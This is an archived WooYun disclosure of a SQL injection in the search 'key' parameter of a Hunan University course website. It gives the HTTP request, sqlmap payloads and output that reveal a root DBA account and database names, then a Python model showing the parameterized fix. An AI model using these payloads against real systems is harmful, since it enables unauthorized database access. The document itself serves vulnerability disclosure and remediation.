WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops article browser--------http://drop.zone.ci/
2015-12-07: Details reported to the vendor, awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and domain experts
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public
http://acadol.hnu.edu.cn
POST /Hunan/ajax/question/getList.do HTTP/1.1
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://acadol.hnu.edu.cn
Cookie: JSESSIONID=84C8AC98912A4DCD66DA4BBFBA892712; looyu_id=cbe248b02accdf85c0a4bb0ad3ee6529b2_10035260%3A1; looyu_10035260=v%3Acbe248b02accdf85c0a4bb0ad3ee6529b2%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8100.talk99.cn/monitor%2Cp0%3Ahttp%253A//acadol.hnu.edu.cn/Hunan/university/news/list.do; _99_mon=%5B1%2C6%2C0%5D; __t99_10035260="_u:cbe248b02accdf85c0a4bb0ad3ee6529b2,_v:cbe248b02accdf85c0a4bb0ad3ee6529b2,_site:6759,_ct:1,_ref:http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29,_p0:http%3A%2F%2Facadol.hnu.edu.cn%2FHunan%2Funiversity%2Fnews%2Flist.do,_r:"
Host: acadol.hnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

by=desc&catalogId=0&courseId=0&curPage=1&key=&order=hot&pageSize=12
The key parameter is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND 3937=3937 AND 'HGnX' LIKE 'HGnX&order=hot&pageSize=12

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND (SELECT 9756 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(9756=9756,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RLdI' LIKE 'RLdI&order=hot&pageSize=12
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
current user: 'root@%'
current database: 'hndx'
current user is DBA: True
available databases [7]:
[*] hndx
[*] hndx_ceshi
[*] hunan
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
back-end DBMS: MySQL 5.0
[13:35:15] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:35:15] [INFO] fetching tables for database: 'hndx'
[13:35:15] [INFO] the SQL query used returns 454 entries
MySQL DBA privileges...
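Added example, not the site's own JSP code: a Python model of the injectable key search, with sqlite3 standing in for MySQL, showing the string-concatenated query that lets the report's boolean pair (3937=3937 versus 3937=3938) change the result set, the parameter-bound version that does not, and a regression check built on that pair. The course table, its rows and the function names are constructed here; the fix stops the injection itself, while the 'root@%' DBA account in the report is a separate least-privilege problem.

```python
import sqlite3

# Constructed sample rows standing in for the site's course table.
SAMPLE_COURSES = [("Linear Algebra", "hot"), ("Data Mining", "hot"), ("Ethics", "new")]

# The boolean pair from the report: identical except 3937=3937 vs 3937=3938.
TRUE_PAYLOAD = "' AND 3937=3937 AND 'HGnX' LIKE 'HGnX"
FALSE_PAYLOAD = "' AND 3937=3938 AND 'HGnX' LIKE 'HGnX"


def make_db():
    """In-memory SQLite database holding the constructed course rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course (id INTEGER PRIMARY KEY, title TEXT, tag TEXT)")
    conn.executemany("INSERT INTO course (title, tag) VALUES (?, ?)", SAMPLE_COURSES)
    return conn


def search_vulnerable(conn, key):
    """Keyword search built by string concatenation (the flaw in the report).

    A quote inside `key` closes the literal, so the rest of the value runs as
    SQL: the TRUE payload returns every row, the FALSE payload returns none.
    """
    sql = "SELECT title FROM course WHERE title LIKE '%" + key + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, key):
    """Same search with a bound parameter: `key` stays data, never SQL.

    LIKE wildcards (% and _) inside `key` still act as wildcards; escape
    them if exact substring matching is wanted, but they cannot inject SQL.
    """
    sql = "SELECT title FROM course WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + key + "%",))]


def differs_on_boolean_pair(conn, search):
    """Regression check: a boolean-blind hole shows up as different results
    for the TRUE and FALSE payloads; a safe query treats both as plain text."""
    return search(conn, TRUE_PAYLOAD) != search(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable differs:", differs_on_boolean_pair(db, search_vulnerable))  # True
    print("fixed differs:     ", differs_on_boolean_pair(db, search_fixed))       # False
```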
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-12-08 08:21
Thanks, will fix as soon as possible.
None